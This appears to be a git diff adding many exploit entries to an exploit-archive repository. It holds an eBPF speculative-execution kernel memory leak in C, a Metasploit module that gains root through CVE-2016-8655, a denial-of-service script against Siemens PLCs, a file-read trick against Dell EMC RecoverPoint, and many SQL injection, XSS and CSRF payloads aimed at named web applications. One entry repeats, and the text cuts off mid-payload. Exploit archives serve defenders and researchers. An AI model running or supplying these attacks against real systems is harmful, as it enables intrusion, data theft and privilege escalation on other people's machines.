bpf_(BPF_PROG_LOAD, &create_prog_attrs); + int errno_ = errno; + //printf("==========================\n%s==========================\n", +verifier_log); + errno = errno_; + if (progfd == -1) + err(1, "prog load"); + return progfd; +} + +int create_filtered_socket_fd(struct bpf_insn *insns, size_t insns_count) { + int progfd = prog_load(insns, insns_count); + + // hook eBPF program up to a socket + // sendmsg() to the socket will trigger the filter + // returning 0 in the filter should toss the packet + int socks[2]; + if (socketpair(AF_UNIX, SOCK_DGRAM, 0, socks)) + err(1, "socketpair"); + if (setsockopt(socks[0], SOL_SOCKET, SO_ATTACH_BPF, &progfd, sizeof(int))) + err(1, "setsockopt"); + return socks[1]; +} + +void trigger_proc(int sockfd) { + if (write(sockfd, "X", 1) != 1) + err(1, "write to proc socket failed"); +} + +int input_map, leak_map; +int sockfds[16]; + +int leak_bit(unsigned long addr, int bit) { + array_set_dw(input_map, 0, addr); + int count_0 = 0, count_1 = 0; + while (count_0 + count_1 < 100) { + array_time_flush_loc(leak_map, 0, 2048+0x1000); + trigger_proc(sockfds[bit+8]); + unsigned int t1 = array_time_flush_loc(leak_map, 0, 2048+0x1000); + + array_time_flush_loc(leak_map, 0, 2048); + trigger_proc(sockfds[bit+0]); + unsigned int t0 = array_time_flush_loc(leak_map, 0, 2048); + + //printf("%u %u\n", t0, t1); + if (t0 < 50) + count_0++; + if (t1 < 50) + count_1++; + } + printf("%d vs %d\n", count_0, count_1); + return (count_0 > count_1) ? 0 : 1; +} + +int leak_byte(unsigned long addr) { + int byte = 0; + for (int bit=0; bit<8; bit++) { + byte |= leak_bit(addr, bit)<= 8); + int selected_bit = i & 7; + struct bpf_insn insns[] = { + /* setup: write 0x00 or 0xff to -216 to get a big stack +allocation and to prepare dummy */ + BPF_ST_MEM(BPF_B, BPF_REG_FP, -216, dummy_ff ? 0x00 : 0xff), + + /* setup: compute stack slot pointers to : + * - type-confused stack slot (at -72) + * - pointer to type-confused stack slot (at -144) + */ + BPF_MOV64_REG(BPF_REG_CONFUSED_SLOT, BPF_REG_FP), + BPF_ALU64_IMM(BPF_ADD, BPF_REG_CONFUSED_SLOT, -72), + BPF_MOV64_REG(BPF_REG_SLOW_SLOT, BPF_REG_FP), + BPF_ALU64_IMM(BPF_ADD, BPF_REG_SLOW_SLOT, -144), + //BPF_MOV64_REG(BPF_REG_0, BPF_REG_FP), + //BPF_ALU64_IMM(BPF_ADD, BPF_REG_0, -216), + + /* write to dummy slot (to make a big stack and to permit later read) */ + //BPF_ST_MEM(BPF_DW, BPF_REG_0, 0, 0), + + /* setup: store victim memory pointer in BPF_REG_CONFUSED_SLOT */ + BPF_LD_MAP_FD(BPF_REG_ARG1, input_map), + BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_FP), + BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG2, -4), + BPF_ST_MEM(BPF_W, BPF_REG_ARG2, 0, 0), + BPF_EMIT_CALL(BPF_FUNC_map_lookup_elem), + BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1), + BPF_EXIT_INSN(), + BPF_LDX_MEM(BPF_DW, BPF_REG_0, BPF_REG_0, 0), + BPF_STX_MEM(BPF_DW, BPF_REG_CONFUSED_SLOT, BPF_REG_0, 0), + + /* setup: spill pointer to type-confused stack slot */ + BPF_STX_MEM(BPF_DW, BPF_REG_SLOW_SLOT, BPF_REG_CONFUSED_SLOT, 0), + + /* setup: load pointer to leak area into register */ + BPF_LD_MAP_FD(BPF_REG_ARG1, leak_map), + BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_FP), + BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG2, -4), + BPF_ST_MEM(BPF_W, BPF_REG_ARG2, 0, 0), + BPF_EMIT_CALL(BPF_FUNC_map_lookup_elem), + BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1), + BPF_EXIT_INSN(), + BPF_ALU64_IMM(BPF_ADD, BPF_REG_0, 2048), /* leak_map+2048 */ + BPF_MOV64_REG(BPF_REG_LEAK_ARRAY, BPF_REG_0), + + /* CHEATED: fence and flush */ + BPF_MOV64_REG(BPF_REG_1, BPF_REG_SLOW_SLOT), + BPF_EMIT_CALL(4/*clflush_mfence*/), + + BPF_MOV64_REG(BPF_REG_DUMMY_SLOT, BPF_REG_FP), + BPF_ALU64_IMM(BPF_ADD, BPF_REG_DUMMY_SLOT, -216), + + /* START CRITICAL PATH */ + BPF_LDX_MEM(BPF_DW, BPF_REG_CONFUSED_SLOT_ALIAS, +BPF_REG_SLOW_SLOT, 0), /* high-latency read of slot address */ + BPF_STX_MEM(BPF_DW, BPF_REG_CONFUSED_SLOT_ALIAS, +BPF_REG_DUMMY_SLOT, 0), /* bypassed store via high-latency address */ + BPF_LDX_MEM(BPF_DW, BPF_REG_CONFUSED, BPF_REG_CONFUSED_SLOT, 0), + + BPF_LDX_MEM(BPF_B, BPF_REG_SECRET_VALUE, BPF_REG_CONFUSED, 0), + BPF_ALU64_IMM(BPF_AND, BPF_REG_SECRET_VALUE, 1<= 0) + printf(" %u\n", res); + } +*/ + + unsigned long base_addr = strtoull(argv[1], NULL, 16); + for (int i=0; i Proof Of Concept + +-------- > Request + +POST /php/login.php HTTP/1.1 +Cache-Control: no-cache +User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, +like Gecko) Chrome/41.0.2272.16 Safari/537.36 +Accept: */* +Referer: http://IpAdress// +X-Requested-With: XMLHttpRequest +Accept-Language: en-us,en;q=0.5 +Host: IPAdress +Accept-Encoding: gzip, deflate +Content-Length: 304 +Content-Type: application/x-www-form-urlencoded; charset=UTF-8 + +login=-1%27+and+6%3d3+or+1%3d1%2b(SELECT+1+and+ROW(1%2c1)%3e(SELECT+COUNT(*)%2cCONCAT(CHAR(95)%2cCHAR(33)%2cCHAR(64)%2cCHAR(52)%2cCHAR(100)%2cCHAR(105)%2cCHAR(108)%2cCHAR(101)%2cCHAR(109)%2cCHAR(109)%2cCHAR(97)%2c0x3a%2cFLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.COLLATIONS+GROUP+BY+x)a)%2b%27&password=3 + +-------- > Response + +HTTP/1.1 200 OK +Server: Apache +Content-Length: 261 +X-Frame-Options: SAMEORIGIN +Content-Type: text/html; charset=UTF-8 +Content-Encoding: +Date: Wed, 16 May 2018 10:49:31 GMT +Vary: Accept-Encoding + +
+Warning: mysqli::query(): (23000/1062): Duplicate entry +'_!@4dilemma:1' for key 'group_key' in +/share/HDA_DATA/Web/php/login.php on line 46
+
+Notice: Trying to get property of non-object in +/share/HDA_DATA/Web/php/login.php on line 47
+FALSE
+Fatal error: Call to a member function free() on boolean in +/share/HDA_DATA/Web/php/login.php on line 67
\ No newline at end of file diff --git a/exploits/java/webapps/44691.txt b/exploits/java/webapps/44691.txt new file mode 100644 index 000000000..8af6e9e84 --- /dev/null +++ b/exploits/java/webapps/44691.txt @@ -0,0 +1,17 @@ +# Exploit Title: ERPnext 11.x.x - Cross-Site Scripting +# Date: 2018-05-10 +# Exploit Author: Veerababu Penugonda +# Vendor Homepage: https://erpnext.com/ +# Software Link: https://demo.erpnext.com/ +# Version: Frappe ERPNext v11.x.x-develop +# Tested on: Mozilla Firefox quantum 60.1 , Ubuntu OS +# CVE : CVE-2018-11339 + +# 1. Description: +# https://demo.erpnext.com/desk#Form/Asset%20Repair/ARLOG-000015 +# and functionality “Comment” is vulnerable to XSS like Stored , +# Reflected , Cookie , possible for more + +# 2. Payload : + +"> \ No newline at end of file diff --git a/exploits/linux/dos/44693.py b/exploits/linux/dos/44693.py new file mode 100755 index 000000000..09f76d373 --- /dev/null +++ b/exploits/linux/dos/44693.py @@ -0,0 +1,18 @@ +# Exploit Title: Siemens SIMATIC S7-1500 CPU - Remote Denial of Service +# Google Dork: inurl:/Portal/Portal.mwsl +# Date: 2018-05-22 +# Exploit Author: t4rkd3vilz, Jameel Nabbo +# Vendor Homepage: https://www.siemens.com/ +# Version: SIMATIC S7-1500 CPU all versions before V1.6 +# Tested on: Kali Linux +# CVE: CVE-2014-5074 + + +#!/usr/bin/python + +import socket import sys from time import sleep if +len(sys.argv) != 2: print "Usage: exploit.py " sys.exit(0) for x in +range(1,50): s=socket.socket(socket.AF_INET, socket.SOCK_STREAM) +#vulnerable TCP port 102 connect=s.connect((str(sys.argv[1]), 102)) +s.send('some evil string \r\n\n') print "bufff " + str(x) + " sent...\n" +result=s.recv(1024) print result s.close() sleep(7) \ No newline at end of file diff --git a/exploits/linux/local/44688.txt b/exploits/linux/local/44688.txt new file mode 100644 index 000000000..b049a6d41 --- /dev/null +++ b/exploits/linux/local/44688.txt @@ -0,0 +1,30 @@ +# Exploit Title: Dell EMC RecoverPoint boxmgmt CLI < 5.1.2 - Arbitrary File Read +# Version: All versions before RP 5.1.2, and all versions before RP4VMs 5.1.1.3 +# Date: 2018-05-21 +# Vendor Advisory: DSA-2018-095 +# Vendor KB: https://support.emc.com/kb/521234 +# Exploit Author: Paul Taylor +# Github: https://github.com/bao7uo/dell-emc_recoverpoint +# Website: https://www.foregenix.com/blog/foregenix-identify-dell-emc-recoverpoint-zero-day-vulnerabilities +# Tested on: RP4VMs 5.1.1.2, RP 5.1.SP1.P2 +# CVE: N/A + +# 1. Description +# When logging in as boxmgmt and running an internal command, the ssh command may be used +# to display the contents of files from the file system which are accessible to the boxmgmt user. + +# 2. Proof of Concept +# Log in as boxmgmt via SSH (default credentials boxmgmt/boxmgmt) +# Select [3] Diagnostics +# Select [5] Run Internal Command +# ssh -F /etc/passwd 127.0.0.1 + +test-cluster: 5 +This is the list of commands you are allowed to use: ALAT NetDiag arp arping date ethtool kps.pl netstat ping ping6 ssh telnet top uptime +Enter internal command: ssh -F /etc/passwd 127.0.0.1 +/etc/passwd: line 1: Bad configuration option: root:x:0:0:root:/root:/bin/tcsh +/etc/passwd: line 2: Bad configuration option: daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin +/etc/passwd: line 3: Bad configuration option: bin:x:2:2:bin:/bin:/usr/sbin/nologin + +/etc/passwd: terminating, 34 bad configuration options +Command "ssh -F /etc/passwd 127.0.0.1" exited with return code 65280 \ No newline at end of file diff --git a/exploits/linux/local/44696.rb b/exploits/linux/local/44696.rb new file mode 100755 index 000000000..4ff526896 --- /dev/null +++ b/exploits/linux/local/44696.rb @@ -0,0 +1,200 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Exploit::Local + Rank = GoodRanking + + include Msf::Post::File + include Msf::Post::Linux::Priv + include Msf::Post::Linux::System + include Msf::Post::Linux::Kernel + include Msf::Exploit::EXE + include Msf::Exploit::FileDropper + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'AF_PACKET chocobo_root Privilege Escalation', + 'Description' => %q{ + This module exploits a race condition and use-after-free in the + packet_set_ring function in net/packet/af_packet.c (AF_PACKET) in + the Linux kernel to execute code as root (CVE-2016-8655). + + The bug was initially introduced in 2011 and patched in 2016 in version + 4.4.0-53.74, potentially affecting a large number of kernels; however + this exploit targets only systems using Ubuntu (Trusty / Xenial) kernels + 4.4.0 < 4.4.0-53, including Linux distros based on Ubuntu, such as + Linux Mint. + + The target system must have unprivileged user namespaces enabled and + two or more CPU cores. + + Bypasses for SMEP, SMAP and KASLR are included. Failed exploitation + may crash the kernel. + + This module has been tested successfully on Linux Mint 17.3 (x86_64); + Linux Mint 18 (x86_64); and Ubuntu 16.04.2 (x86_64) with kernel + versions 4.4.0-45-generic and 4.4.0-51-generic. + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'rebel', # Discovery and chocobo_root.c exploit + 'Brendan Coles' # Metasploit + ], + 'DisclosureDate' => 'Aug 12 2016', + 'Platform' => [ 'linux' ], + 'Arch' => [ ARCH_X86, ARCH_X64 ], + 'SessionTypes' => [ 'shell', 'meterpreter' ], + 'Targets' => [[ 'Auto', {} ]], + 'Privileged' => true, + 'References' => + [ + [ 'AKA', 'chocobo_root.c' ], + [ 'EDB', '40871' ], + [ 'CVE', '2016-8655' ], + [ 'BID', '94692' ], + [ 'URL', 'http://seclists.org/oss-sec/2016/q4/607' ], + [ 'URL', 'http://seclists.org/oss-sec/2016/q4/att-621/chocobo_root_c.bin' ], + [ 'URL', 'https://github.com/bcoles/kernel-exploits/blob/master/CVE-2016-8655/chocobo_root.c' ], + [ 'URL', 'https://bitbucket.org/externalist/1day_exploits/src/master/CVE-2016-8655/CVE-2016-8655_chocobo_root_commented.c' ], + [ 'URL', 'https://usn.ubuntu.com/3151-1/' ], + [ 'URL', 'https://www.securitytracker.com/id/1037403' ], + [ 'URL', 'https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=84ac7260236a49c79eede91617700174c2c19b0c' ] + ], + 'DefaultTarget' => 0)) + register_options [ + OptInt.new('TIMEOUT', [ true, 'Race timeout (seconds)', '600' ]), + OptEnum.new('COMPILE', [ true, 'Compile on target', 'Auto', %w(Auto True False) ]), + OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ]), + ] + end + + def timeout + datastore['TIMEOUT'].to_i + end + + def base_dir + datastore['WritableDir'].to_s + end + + def upload(path, data) + print_status "Writing '#{path}' (#{data.size} bytes) ..." + rm_f path + write_file path, data + end + + def upload_and_chmodx(path, data) + upload path, data + cmd_exec "chmod +x '#{path}'" + end + + def upload_and_compile(path, data) + upload "#{path}.c", data + + gcc_cmd = "gcc -o #{path} #{path}.c -lpthread" + if session.type.eql? 'shell' + gcc_cmd = "PATH=$PATH:/usr/bin/ #{gcc_cmd}" + end + output = cmd_exec gcc_cmd + rm_f "#{path}.c" + + unless output.blank? + print_error output + fail_with Failure::Unknown, "#{path}.c failed to compile" + end + + cmd_exec "chmod +x #{path}" + end + + def exploit_data(file) + path = ::File.join Msf::Config.data_directory, 'exploits', 'CVE-2016-8655', file + fd = ::File.open path, 'rb' + data = fd.read fd.stat.size + fd.close + data + end + + def live_compile? + return false unless datastore['COMPILE'].eql?('Auto') || datastore['COMPILE'].eql?('True') + + if has_gcc? + vprint_good 'gcc is installed' + return true + end + + unless datastore['COMPILE'].eql? 'Auto' + fail_with Failure::BadConfig, 'gcc is not installed. Compiling will fail.' + end + end + + def check + version = kernel_release + unless version =~ /^4\.4\.0-(21|22|24|28|31|34|36|38|42|43|45|47|51)-generic/ + vprint_error "Linux kernel version #{version} is not vulnerable" + return CheckCode::Safe + end + vprint_good "Linux kernel version #{version} is vulnerable" + + arch = kernel_hardware + unless arch.include? 'x86_64' + vprint_error "System architecture #{arch} is not supported" + return CheckCode::Safe + end + vprint_good "System architecture #{arch} is supported" + + cores = get_cpu_info[:cores].to_i + min_required_cores = 2 + unless cores >= min_required_cores + vprint_error "System has less than #{min_required_cores} CPU cores" + return CheckCode::Safe + end + vprint_good "System has #{cores} CPU cores" + + unless userns_enabled? + vprint_error 'Unprivileged user namespaces are not permitted' + return CheckCode::Safe + end + vprint_good 'Unprivileged user namespaces are permitted' + + CheckCode::Appears + end + + def exploit + if check != CheckCode::Appears + fail_with Failure::NotVulnerable, 'Target is not vulnerable' + end + + if is_root? + fail_with Failure::BadConfig, 'Session already has root privileges' + end + + unless cmd_exec("test -w '#{base_dir}' && echo true").include? 'true' + fail_with Failure::BadConfig, "#{base_dir} is not writable" + end + + # Upload exploit executable + executable_name = ".#{rand_text_alphanumeric rand(5..10)}" + executable_path = "#{base_dir}/#{executable_name}" + if live_compile? + vprint_status 'Live compiling exploit on system...' + upload_and_compile executable_path, exploit_data('chocobo_root.c') + else + vprint_status 'Dropping pre-compiled exploit on system...' + upload_and_chmodx executable_path, exploit_data('chocobo_root') + end + + # Upload payload executable + payload_path = "#{base_dir}/.#{rand_text_alphanumeric rand(5..10)}" + upload_and_chmodx payload_path, generate_payload_exe + + # Launch exploit + print_status "Launching exploit (Timeout: #{timeout})..." + output = cmd_exec "echo '#{payload_path} & exit' | #{executable_path}", nil, timeout + output.each_line { |line| vprint_status line.chomp } + print_status "Cleaning up #{payload_path} and #{executable_path}.." + rm_f executable_path + rm_f payload_path + end +end \ No newline at end of file diff --git a/exploits/linux/webapps/44687.txt b/exploits/linux/webapps/44687.txt new file mode 100644 index 000000000..398101dd6 --- /dev/null +++ b/exploits/linux/webapps/44687.txt @@ -0,0 +1,12 @@ +# Exploit Title: Siemens SIMATIC S7-1200 CPU - Cross-Site Scripting +# Google Dork: inurl:/Portal/Portal.mwsl +# Date: 2018-05-22 +# Exploit Author: t4rkd3vilz, Jameel Nabbo +# Vendor Homepage: https://www.siemens.com/ +# Version: SIMATIC S7-1200 CPU family Versions: V2.X and V3.X. +# Tested on: Kali Linux +# CVE: CVE-2014-2908 + +http://TargetIp/Portal/Portal.mwsl?PriNav=Bgz&filtername=Name&filtervalue= +">&Send=Filter \ No newline at end of file diff --git a/exploits/linux/webapps/44698.txt b/exploits/linux/webapps/44698.txt new file mode 100644 index 000000000..1a86c1b98 --- /dev/null +++ b/exploits/linux/webapps/44698.txt @@ -0,0 +1,39 @@ +# Exploit Title: NewsBee CMS 1.4 - 'home-text-edit.php' SQL Injection +# Dork: N/A +# Date: 2018-05-22 +# Exploit Author: Özkan Mustafa Akkuş (AkkuS) +# Vendor Homepage: https://codecanyon.net/item/newsbee-fully-featured-news-cms-with-bootstrasp-php-mysql/19404937 +# Version: 1.4 / fourth update +# Category: Webapps +# Tested on: Kali linux + +# PoC: SQLi: +# Parameter: id +# Type: boolean-based blind +# Demo: http://target/NewsBee/admin/home-text-edit.php?id=5 +# Payload: + +Payload: id=5' AND 3563=3563 AND 'HmOW'='HmOW + +# Type: error-based +# Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) +# Payload: + +id=5' AND (SELECT 7446 FROM(SELECT +COUNT(*),CONCAT(0x7178707871,(SELECT +(ELT(7446=7446,1))),0x7176716a71,FLOOR(RAND(0)*2))x FROM +INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'rNYc'='rNYc + +# Type: AND/OR time-based blind +# Demo: http://target/NewsBee/admin/home-text-edit.php?id=5 +# Payload: + +id=5' AND SLEEP(5) AND 'KdYd'='KdYd + +# Type: UNION query +# Demo: http://target/NewsBee/admin/home-text-edit.php?id=5 +# Payload: + +id=-1714' UNION ALL SELECT +NULL,NULL,CONCAT(0x7162787871,0x51487655536a566c616e5156496a6a56426267495670596f644f466f554753504469636d4358694c,0x71766a7871),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- +WSZd&t=gallery \ No newline at end of file diff --git a/exploits/php/webapps/44685.txt b/exploits/php/webapps/44685.txt new file mode 100644 index 000000000..af30bd914 --- /dev/null +++ b/exploits/php/webapps/44685.txt @@ -0,0 +1,87 @@ +# Exploit Title: Zechat 1.5 - 'hashtag' / 'v' SQL Injection / Cross site request forgery +# Date: 2018-05-22 +# Exploit Author: Borna nematzadeh (L0RD) or borna.nematzadeh123@gmail.com +# Vendor Homepage: https://bylancer.com +# Version: 1.5 +# Tested on: Kali linux +==================================================== +# POC 1 : SQLi : + +Parameter : hashtag + type : Union based + +http://test.com/chat/hashtag?hashtag=[SQL] + +# test : +http://test.com/chat/hashtag?hashtag=-1%27%20UNION%20SELECT%20NULL,unhex(hex(group_concat(table_name,0x3C62723E,column_name))),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL%20from%20information_schema.columns%20where%20table_schema=schema()%23 + +# Payload : -1' UNION SELECT +NULL,unhex(hex(group_concat(table_name,0x3C62723E,column_name))),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL +from information_schema.columns where table_schema=schema()%23 + +==================================================== + +Parameter : v + type : time-based blind + +test.com/chat/me?action=edit&v=[SQL] + +# test : test.com/chat/me?action=edit&v=231 AND sleep(10)%23 + +# Payload : AND sleep(10)%23 + +==================================================== + +# POC 2 : CSRF : + +# CSRF vulnerability allows attacker to change user's information. +In this script we have anti-csrf which we can't change user's information +without token. +So we use 'hashtag' parameter to set our encoded payload and bypass csrf +protection : chat/hashtag?hashtag=[We have Reflected XSS here] + +# Exploit : + +
+ + + + + + + + + + + + +
+ + + +===================================================== \ No newline at end of file diff --git a/exploits/php/webapps/44686.txt b/exploits/php/webapps/44686.txt new file mode 100644 index 000000000..f26f83813 --- /dev/null +++ b/exploits/php/webapps/44686.txt @@ -0,0 +1,10 @@ +# Exploit Title: WebSocket Live Chat - Cross-Site Scripting +# Date: 2018-05-22 +# Exploit Author: Alireza Norkazemi +# Vendor Homepage: https://codecanyon.net/item/websocket-live-chat-instant-messaging-php/16545798?s_rank=1 + +# POC : +1) Create your account and click setting icon and go to profile +2) Put this payload into Status box : + +3) The payload will be executed if someone opens your profile \ No newline at end of file diff --git a/exploits/php/webapps/44689.txt b/exploits/php/webapps/44689.txt new file mode 100644 index 000000000..29817a721 --- /dev/null +++ b/exploits/php/webapps/44689.txt @@ -0,0 +1,27 @@ +# Exploit Title: PaulPrinting CMS Printing 1.0 - SQL Injection +# Exploit Date: 2018-05-19 +# Software Link: https://codecanyon.net/item/paulprinting-cms-printing-solutions/19546365 +# Author: Mehmet Onder Key +# Version: 1.0 +# Tested On: Linux + +# 1. Description +# Any visitor can run code to exploit css and sql vulnerabilities in the +# products and order sections. + +# 2. Proof of Concept +# Example parameter with demo site : http://demo.codepaul.com/ +# printing/products/businesscard?pricelist=1&format=90x50&pages=2p4cf& +# paper=300g_ma&refinement=lamco + +# Time-Based Blind SQL Payload: +format=keyney+akkus') OR SLEEP(5)-- DLea + +# Boolean-Based Blind SQL Payload: +refinement=were') OR NOT 4134=4134# + +# Error-Based SQL Payload +paper=here') OR (SELECT 1712 FROM(SELECT COUNT(*),CONCAT(0x71706b6a71,(SELECT +(ELT(1712=1712,1))),0x7171706a71,FLOOR(RAND(0)*2))x FROM +INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- oXDz +etc... (all parameter is effected -pricelist) \ No newline at end of file diff --git a/exploits/php/webapps/44692.txt b/exploits/php/webapps/44692.txt new file mode 100644 index 000000000..8c4c2f000 --- /dev/null +++ b/exploits/php/webapps/44692.txt @@ -0,0 +1,51 @@ +# Exploit Title: iSocial 1.2.0 - Cross-Site Scripting / Cross-Site Request Forgery +# Date: 2018-05-22 +# Exploit Author: Borna nematzadeh (L0RD) +# Vendor Homepage: https://codecanyon.net/item/isocial-social-network-platform/21164041?s_rank=2 +# Version: 1.2.0 +# Tested on: Kali linux + +# POC 1 : Cross-Site scripting: + +1) Create your account and navigate to "write post". +2) Put this payload and click on "post" : + +3) You will have an alert box in your page . + +# POC 2 : Cross-Site Scripting: + +1) Navigate to "Albums" and click on "create album" +2) In title field , put this payload : +"/> +3) In both cases , the payload will be executed after someone opens your +album or your profile. + +# POC 3 : Cross-Site Request Forgery: +# iSocial - Social Network Platform 1.2.0 suffers from csrf vulnerability . +# Attacker can easily change user's email or delete user's account . + +# Change email Exploit : + + + + CSRF POC + + +
+ +
+ + + + +# Result : +# html "The information has been updated" +# status "OK" +# message "" + +# Delete account Exploit: + + \ No newline at end of file diff --git a/exploits/php/webapps/44699.txt b/exploits/php/webapps/44699.txt new file mode 100644 index 000000000..974a6b391 --- /dev/null +++ b/exploits/php/webapps/44699.txt @@ -0,0 +1,54 @@ +# Exploit Title: Auto car 1.2 - 'car_title' SQL Injection / Cross-Site Scripting +# Date: 2018-05-22 +# Exploit Author: Borna nematzadeh (L0RD) +# Vendor Homepage: https://codecanyon.net/item/auto-car-car-listing-script/19221368?s_rank=1159 +# Version: 1.2 +# Tested on: Win 10 + +# POC 1: SQLi: + +# Parameter: car_title +# Type: Error based +# Payload: 1' and extractvalue(1,Concat(0x3a,user(),0x3a))# +# test: http://target/scripts/autocar_preview/ + +# Request: + +POST /scripts/autocar_preview/search-cars HTTP/1.1 +Host: kamleshyadav.com +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:61.0) +Gecko/20100101 Firefox/61.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Referer: http://kamleshyadav.com/scripts/autocar_preview/ +Content-Type: application/x-www-form-urlencoded +Content-Length: 58 +Connection: keep-alive +Upgrade-Insecure-Requests: 1 + +car_title=1' and extractvalue(1,Concat(0x3a,user(),0x3a))# + +# Response: + +HTTP/1.1 500 Internal Server Error +Server: nginx/1.12.2 +Date: Tue, 22 May 2018 14:36:47 GMT +Content-Type: text/html; charset=UTF-8 +Content-Length: 1371 +Connection: keep-alive + +

A Database Error Occurred

+

Error Number: 1105

XPATH syntax error: +':kamleshy_event@localhost:'

SELECT +* +FROM `autocar_car_details` +WHERE `car_status` = 1 AND `car_title` LIKE '%1' and +extractvalue(1,Concat(0x3a,user(),0x3a))#%'

+ +# POC 2: Cross site scripting: + +1) Create your account and navigate to "edit profile" +2) Put this payload in "name" and update your profile: + +3) You will have an alert box in your page . \ No newline at end of file diff --git a/exploits/php/webapps/44700.txt b/exploits/php/webapps/44700.txt new file mode 100644 index 000000000..f043ebbb2 --- /dev/null +++ b/exploits/php/webapps/44700.txt @@ -0,0 +1,39 @@ +# Exploit Title: NewsBee CMS 1.4 - 'home-text-edit.php' SQL Injection +# Dork: N/A +# Date: 2018-05-22 +# Exploit Author: Özkan Mustafa Akkuş (AkkuS) +# Vendor Homepage: https://codecanyon.net/item/newsbee-fully-featured-news-cms-with-bootstrasp-php-mysql/19404937 +# Version: 1.4 / fourth update +# Category: Webapps +# Tested on: Kali linux + +# PoC: SQLi: +# Parameter: id +# Type: boolean-based blind +# Demo: http://Target/NewsBee/admin/home-text-edit.php?id=5 +# Payload: + +iPayload: id=5' AND 3563=3563 AND 'HmOW'='HmOW + +# Type: error-based +# Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) +# Payload: + +id=5' AND (SELECT 7446 FROM(SELECT +COUNT(*),CONCAT(0x7178707871,(SELECT +(ELT(7446=7446,1))),0x7176716a71,FLOOR(RAND(0)*2))x FROM +INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'rNYc'='rNYc + +# Type: AND/OR time-based blind +# Demo: http://Target/NewsBee/admin/home-text-edit.php?id=5 +# Payload: + +id=5' AND SLEEP(5) AND 'KdYd'='KdYd + +# Type: UNION query +# Demo: http://Target/NewsBee/admin/home-text-edit.php?id=5 +# Payload: + +id=-1714' UNION ALL SELECT +NULL,NULL,CONCAT(0x7162787871,0x51487655536a566c616e5156496a6a56426267495670596f644f466f554753504469636d4358694c,0x71766a7871),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- +WSZd&t=gallery \ No newline at end of file diff --git a/exploits/php/webapps/44701.txt b/exploits/php/webapps/44701.txt new file mode 100644 index 000000000..418175669 --- /dev/null +++ b/exploits/php/webapps/44701.txt @@ -0,0 +1,22 @@ +# Exploit Title: Feedy RSS News Ticker 2.0 - 'cat' SQL Injection +# Dork: N/A +# Date: 2018-05-22 +# Exploit Author: Özkan Mustafa Akkuş (AkkuS) +# Vendor Homepage: https://codecanyon.net/item/feedy-rss-news-ticker/5818277 +# Version: 2.0 +# Category: Webapps +# Tested on: Kali linux + +# PoC: SQLi: +# Parameter: cat +# Type: boolean-based blind +# Demo: http://target/feedy/category.php?cat= +# Payload: + +cat=akkus+keyney' AND 2367=2367 AND 'NKyC'='NKyC + +# Type: AND/OR time-based blind +# Demo: http://demo.cudevo.com/feedy/category.php?cat=1 +# Payload: + +cat=akkus+keyney' AND SLEEP(5) AND 'AEHg'='AEHg \ No newline at end of file diff --git a/exploits/php/webapps/44702.txt b/exploits/php/webapps/44702.txt new file mode 100644 index 000000000..543633c63 --- /dev/null +++ b/exploits/php/webapps/44702.txt @@ -0,0 +1,62 @@ +# Exploit Title: NewsBee CMS 1.4 - 'download.php' SQL Injection +# Dork: N/A +# Date: 2018-05-22 +# Exploit Author: Özkan Mustafa Akkuş (AkkuS) +# Vendor Homepage: https://codecanyon.net/item/newsbee-fully-featured-news-cms-with-bootstrasp-php-mysql/19404937 +# Version: 1.4 / fourth update +# Category: Webapps +# Tested on: Kali linux + +# PoC: SQLi: +# Parameter: id +# Type: boolean-based blind +# Demo: http://Target/NewsBee/admin/download.php?id=578&t=gallery +# Payload: + +id=578' AND 2043=2043 AND 'KzTm'='KzTm&t=gallery + +# Type: error-based +# Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) +# Payload: + +id=578' AND (SELECT 7126 FROM(SELECT +COUNT(*),CONCAT(0x7162787871,(SELECT +(ELT(7126=7126,1))),0x71766a7871,FLOOR(RAND(0)*2))x FROM +INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'hOBA'='hOBA&t=gallery + +# Type: AND/OR time-based blind +# Demo: http://Target/NewsBee/admin/download.php?id=578&t=gallery +# Payload: + +id=578' AND SLEEP(5) AND 'KlSV'='KlSV&t=gallery + +# Type: UNION query +# Demo: http://Target/NewsBee/admin/download.php?id=578&t=gallery +# Payload: + +id=-1714' UNION ALL SELECT +NULL,NULL,CONCAT(0x7162787871,0x51487655536a566c616e5156496a6a56426267495670596f644f466f554753504469636d4358694c,0x71766a7871),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- +WSZd&t=gallery + +# PoC: SQLi: +# Parameter: t +# Type: boolean-based blind +# Demo: http://Target/NewsBee/admin/download.php?id=578&t=gallery +# Payload: + +id=578&t=gallery` WHERE 7854=7854 AND 1059=1059# + +# Type: error-based +# Demo: http://Target/NewsBee/admin/download.php?id=578&t=gallery +# Payload: + +id=578&t=gallery` WHERE 